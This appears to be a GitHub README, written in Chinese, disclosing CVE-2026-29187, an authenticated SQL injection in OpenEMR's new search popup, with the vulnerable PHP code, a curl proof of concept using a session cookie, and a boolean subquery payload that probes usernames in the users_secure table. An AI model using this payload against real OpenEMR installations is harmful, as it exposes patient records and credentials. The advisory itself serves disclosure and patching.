ChrisSub08/CVE-2026-29187_SqlInjectionVulnerabilityOpenEMR7.0.4

# CVE-2026-29187 - 新搜索弹窗中的 SQL 注入漏洞 ### 摘要 OpenEMR <8.0.0.3 的新搜索弹窗中存在一个 SQL 注入漏洞，可被经过身份验证的攻击者利用。该漏洞的存在是由于新搜索弹窗功能中的输入验证不足。 ### 详情 该漏洞出现在新搜索弹窗功能中，用户在 select relevance column 和 where 条件中提供的输入被直接拼接到 SQL 查询中，未经过适当的清理。这允许攻击者注入恶意的 SQL 代码。 该漏洞影响以下行： - `interface/new/new_search_popup.php` [第 141 行](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L141) - `interface/new/new_search_popup.php` [第 134 行](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L134) 和 [第 136 行](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L136) - `interface/new/new_search_popup.php` [第 125 行](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L125) 和 [第 128 行](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L128) ``` foreach ($_REQUEST as $key => $value) { if (!str_starts_with((string) $key, 'mf_')) { continue; // "match field" } $fldname = substr((string) $key, 3); // pubpid requires special treatment. Match on that is fatal. if ($fldname == 'pubpid') { $relevance .= " + 1000 * ( " . add_escape_custom($fldname) . " LIKE ? )"; array_push($sqlBindArray, $value); } else { $relevance .= " + ( " . add_escape_custom($fldname) . " LIKE ? )"; array_push($sqlBindArray, $value); } $where .= " OR " . add_escape_custom($fldname) . " LIKE ?"; array_push($sqlBindArraySpecial, $value); echo "\n"; ++$numfields; } $sql = "SELECT *, ( $relevance ) AS relevance, " . "DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS " . "FROM patient_data WHERE $where " . "ORDER BY relevance DESC, lname, fname, mname " . "LIMIT " . escape_limit($fstart) . ", " . escape_limit($MAXSHOW) . ""; $sqlBindArray = array_merge($sqlBindArray, $sqlBindArraySpecial); $rez = sqlStatement($sql, $sqlBindArray); ``` ``` SELECT *, ( 0 + ( LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100 ``` ### 概念验证 (PoC) ``` ┌──(kali㉿kali)-[~] └─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'https://172.18.0.3/interface/new/new_search_popup.php?mf_"=test'

SQL Statement failed on preparation: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100'

Query Error

ERROR: query failed: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patien...' at line 1

/var/www/localhost/htdocs/openemr/interface/new/new_search_popup.php at 141:sqlStatement ┌──(kali㉿kali)-[~] └─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'http://172.18.0.3/interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%' ┌──(kali㉿kali)-[~] └─$ ``` 有多种技术可以利用此漏洞；其中之一是布尔攻击，它使用最后一个 payload 运行： ``` SELECT *, ( 0 + ( (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100 ``` ### 影响 - 未授权访问数据库信息 - 敏感医疗信息的潜在数据泄露 - 服务器端代码执行（在某些情况下） - 数据库受损 ### 漏洞修复流程 1. 评估并验证漏洞 2. 申请或分配 CVE ID 3. 创建私有 fork 或私有分支 4. 开发修复程序 5. 编写回归和安全测试 6. 准备发布说明和安全公告草案 7. 发布修复程序（代码合并）并发布补丁版本 8. 公开披露漏洞 ### 致谢 - 研究员：Christophe SUBLET - 组织：Grenoble INP - Esisar, UGA - 项目：CyberSkills, Orion

标签：CISA项目, CVE-2026-29187, OpenEMR, Open Source, OpenVAS, PHP, PNNL实验室, SQL拼接, Web安全, 医疗信息系统, 安全漏洞, 已认证攻击, 数据库攻击, 电子病历, 编程工具, 蓝队分析, 输入验证缺失, 远程代码执行